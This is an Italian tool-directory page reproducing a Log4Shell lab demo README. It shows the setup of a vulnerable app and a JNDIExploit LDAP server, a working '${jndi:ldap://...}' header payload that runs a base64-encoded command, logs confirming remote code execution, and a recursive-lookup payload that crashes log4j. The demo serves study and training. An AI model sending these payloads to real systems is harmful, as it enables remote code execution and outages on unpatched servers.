Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4Shell-CVE-2021-44228-Demo — Demo di Log4Shell con AWS | Kitploit
Strumenti/GitHubGitHub/baboopan/log4shell-cve-2021-44228-demo
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHub
baboopan/log4shell-cve-2021-44228-demo

Log4Shell-CVE-2021-44228-Demo

Demo di Log4Shell con AWS

Vedi Repository
2124 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Demo di Log4Shell (CVE-2021-44228)

demo-scenarios

Configurazione dell'ambiente

Client

  • Ovunque si abbia la possibilità di accedere al server HTTP con la riga di comando curl

App vulnerabile tramite server HTTP con log4j

  • Istanza EC2 Amazon Linux 2 (basata su x86) / Macchina virtuale CentOS su Azure
root@kitploit:~
$ yum install docker -y
$ systemctl enable docker
$ systemctl start docker
$ docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
  • Output della console SSH spring-web-server

Exploit JNDI come server LDAP dannoso

  • Istanza EC2 Amazon Linux 2 (basata su x86)
root@kitploit:~
$ yum install java-11-amazon-corretto.x86_64 -y
# Azure per java-1.7.0-openjdk-1.7.0.261-2.6.22.2.el7_8.x86_64
$ wget https://github.com/Mr-xn/JNDIExploit-1/releases/download/v1.2/JNDIExploit.v1.2.zip
$ unzip JNDIExploit.v1.2.zip
# Indica l'endpoint del servizio come IP privato dell'EC2 dai metadati
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $(curl -s http://169.254.169.254/latest/meta-data/local-ipv4) -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
  • Macchina virtuale CentOS su Azure
root@kitploit:~
$ wget https://corretto.aws/downloads/latest/amazon-corretto-11-x64-linux-jdk.rpm
$ yum install amazon-corretto-11-x64-linux-jdk.rpm -y
$ wget https://github.com/Mr-xn/JNDIExploit-1/releases/download/v1.2/JNDIExploit.v1.2.zip
$ unzip JNDIExploit.v1.2.zip
# Indica l'endpoint del servizio come IP privato dai metadati
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $(curl -sH Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/?api-version=2021-02-01" | awk -F '[:,"]' '{print $5}') -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
  • Output della console SSH jndiexploit

Flusso di sfruttamento

Comportamento normale

Il server restituirà Hello World!, quando il client invia la richiesta correttamente con l'intestazione X-Api-Version. Altrimenti, il client riceverà un errore HTTP 400 come richiesta non valida.

  • Client
root@kitploit:~
$ curl SERVER_IP:8080 -H 'X-Api-Version: 1.1'
Hello, world!
$ curl SERVER_IP:8080
{"timestamp":"2021-12-22T02:44:43.103+00:00","status":400,"error":"Bad Request","path":"/"}

client-requests-normal

  • Log del server
root@kitploit:~
# Richieste con intestazione corretta
2021-12-22 02:44:40.920  INFO 1 --- [nio-8080-exec-3] HelloWorld                               : Received a request for API version 1
It's Hello from System.out.
# Richieste senza input corretto
2021-12-22 02:44:43.102  WARN 1 --- [nio-8080-exec-5] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.bind.MissingRequestHeaderException: Required request header 'X-Api-Version' for method parameter type String is not present]

server-requests-normal

Attacco di injection / CVE-2021-44228

Ora invieremo la richiesta di injection con l'intestazione 'X-Api-Version: ${jndi:ldap://10.0.1.164:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}', che attiverà la CVE-2021-44228 per eseguire la lookup JNDI per accedere a ldap e realizzare l'RCE.

dG91Y2ggL3RtcC9wd25lZAo=} è la codifica base64 del comando linux touch /tmp/pwned. Una volta ottenuto l'RCE, verrà creato un file nell'app vulnerabile.

Puoi anche modificare il comportamento sostituendo la stringa base64 con https://www.base64encode.org/.

  • Client
root@kitploit:~
# Invia la richiesta con injection
$ curl SERVER_IP:8080 -H 'X-Api-Version: ${jndi:ldap://JNDI_EXPLOIT_IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Hello, world!

client-requests-injection

  • Log del server
root@kitploit:~
2021-12-22 03:04:07,042 http-nio-8080-exec-6 WARN Error looking up JNDI resource [ldap://10.0.1.164:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: ExploitxM5KqZop9U cannot be cast to javax.naming.spi.ObjectFactory]; remaining name '"Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo="'
...
...
# Riceve l'injection e la reindirizza al server JNDI Exploit indicato nella richiesta
2021-12-22 03:04:06.567  INFO 1 --- [nio-8080-exec-6] HelloWorld                               : Received a request for API version ${jndi:ldap://JNDI_EXPLOIT_IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}

server-exploit

  • JNDI Exploit
root@kitploit:~
# Riceve la lookup LDAP dall'app vulnerabile del server
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
[+] Paylaod: command
[+] Command: touch /tmp/pwned
# Invia la stringa codificata all'app vulnerabile, fa eseguire all'app il comando in base64
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= redirecting to http://10.0.1.164:8888/ExploitxM5KqZop9U.class
[+] New HTTP Request From /10.0.1.200:33250  /ExploitxM5KqZop9U.class
[+] Receive ClassRequest: ExploitxM5KqZop9U.class
[+] Response Code: 200

jndi-exploit-ldap

  • Verifica il risultato dell'RCE nell'app vulnerabile sul server
root@kitploit:~
# Ottieni l'ID del contenitore dell'app vulnerabile sul server
$ docker ps -a
CONTAINER ID   IMAGE            COMMAND                  CREATED             STATUS             PORTS                                       NAMES
a4b14c4adb6c   vulnerable-app   "java -jar /app/spri…"   About an hour ago   Up About an hour   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   vulnerable-app
# Elenca la cartella /tmp prima dell'injection
$ docker exec -i -t a4b14c4adb6c ls -l /tmp/
total 0
drwxr-xr-x    2 root     root            15 Dec 22 02:34 hsperfdata_root
drwx------    2 root     root             6 Dec 22 01:34 tomcat-docbase.8080.228050961485794229
drwx------    3 root     root            18 Dec 22 01:34 tomcat.8080.4816494392465116780
# Conferma che l'RCE è stato ottenuto tramite la richiesta di injection
$ docker exec -i -t a4b14c4adb6c ls -l /tmp/
total 0
drwxr-xr-x    2 root     root            15 Dec 22 02:34 hsperfdata_root
-rw-r--r--    1 root     root             0 Dec 22 03:04 pwned # RCE ottenuto
drwx------    2 root     root             6 Dec 22 01:34 tomcat-docbase.8080.228050961485794229
drwx------    3 root     root            18 Dec 22 01:34 tomcat.8080.4816494392465116780

server-app-pwned

Attacco di injection / CVE-2021-45105

Le versioni di Log4j2 dalla 2.0-alpha1 alla 2.16.0, escluse le 2.12.3, non proteggevano da ricorsione incontrollata dovuta a lookup auto-referenziali. Quando la configurazione di logging utilizza un Pattern Layout non predefinito con un Context Lookup, gli attaccanti con controllo sui dati di input del Thread Context Map (MDC) possono creare dati malevoli contenenti una lookup ricorsiva, causando un StackOverflowError che terminerà il processo. - Descrizione di CVE-2021-45105, Apache

Ora possiamo inserire il Thread Context Map con la classe StrSubstitutor ${${::-${::-$${::-j}}}} per far crashare l'applicazione a causa di un errore di ricorsione infinita.

  • Client
root@kitploit:~
# Invia la richiesta con injection
$ curl SERVER_IP:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'
Hello, world!

client-requests-45105

  • Log del server
root@kitploit:~
2021-12-22 03:42:38,614 http-nio-8080-exec-2 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-$}}: :
...
...
    at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)

server-error-infinite-loop

Riferimenti

  • christophetd/log4shell-vulnerable-app
  • Mr-xn/JNDIExploit
Scarica lo strumento